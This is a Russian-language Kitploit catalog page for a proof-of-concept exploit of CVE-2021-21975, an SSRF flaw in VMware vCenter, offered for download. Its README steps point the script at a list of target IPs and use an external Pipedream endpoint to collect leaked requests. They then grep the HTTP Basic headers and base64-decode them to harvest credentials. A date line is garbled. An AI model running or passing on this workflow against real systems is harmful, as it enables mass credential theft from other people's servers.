Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-21975 — Эксплойт proof-of-concept для CVE-2021-21975 (SSRF в VMware vCenter Server), использующий подделку серверных запросов для утечки учётных данных в кодировке base64 через HTTP Basic-аутентификацию. | Kitploit
Инструменты/GitHubGitHub/dorkerdevil/cve-2021-21975
РазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информации
GitHubdorkerdevil/cve-2021-21975

CVE-2021-21975

Эксплойт proof-of-concept для CVE-2021-21975 (SSRF в VMware vCenter Server), использующий подделку серверных запросов для утечки учётных данных в кодировке base64 через HTTP Basic-аутентификацию.

Репозиторий
2225 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-21975

#SSRF-POC - ssrf к утечке учетных данных

#Сначала настройте pd client.

#Теперь запустите ./pd deploy http-new-requests

#теперь замените http-запрос pipedream напр.: Randomstring.m.pipedream.net в скрипте

#запустите это в отдельном терминале - ./pd logs new-requests | tee -a req.txt

#и теперь запустите это в другом терминале - python3 CVE-2021-21975.py iplist

#cat req.txt | grep Basic > basic.txt; cat basic.txt | sort --unique > basic_uniq.txt ; base64 -d basic_uniq.txt

"Это ранний proof of concept, созданный, когда уязвимость стала публичной несколько месяцев назад, так что используйте его на свой страх и риск." :V

#авторы @wabaf3t @D0rkerDevil

Скачать инструмент